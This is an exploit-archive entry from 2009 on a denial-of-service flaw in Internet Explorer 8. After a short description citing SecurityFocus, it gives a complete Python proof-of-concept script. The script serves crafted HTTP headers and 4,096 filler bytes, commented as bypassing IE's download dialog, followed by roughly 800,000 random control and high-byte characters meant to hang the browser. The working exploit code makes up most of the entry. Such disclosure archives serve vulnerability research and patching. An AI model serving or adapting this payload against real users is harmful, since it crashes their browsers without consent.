Microsoft Internet Explorer 8 - File Download Denial of Service

2009-04-11T00:00:00
ID EXPLOITPACK:8F3AD61FAD97B767D7F8B52509528EF3
Type exploitpack
Reporter Nam Nguyen
Modified 2009-04-11T00:00:00

Description

Microsoft Internet Explorer 8 - File Download Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/34478/info

Microsoft Internet Explorer is prone to a remote denial-of-service vulnerability.

Successful exploits can allow attackers to hang the affected browser, resulting in denial-of-service conditions. 

#/usr/bin/env python
import sys
import random

CHAR_SET = [chr(x) for x in range(0x20)]
CHAR_SET += [chr(x) for x in range(128, 256)]

def send_file():
      l = 800000 + 4096
      print "Content-Type: text/plain"
      print "Content-Length: %d" % l
      print "Cache-Control: no-cache, no-store, must-revalidate"
      # this is not standardized, but use it anyway
      print "Pragma: no-cache"
      print ""
      # bypass IE download dialog
      sys.stdout.write("a" * 4096)
      # print junks
      for i in xrange(l):
              sys.stdout.write(random.choice(CHAR_SET))
      sys.exit()

send_file()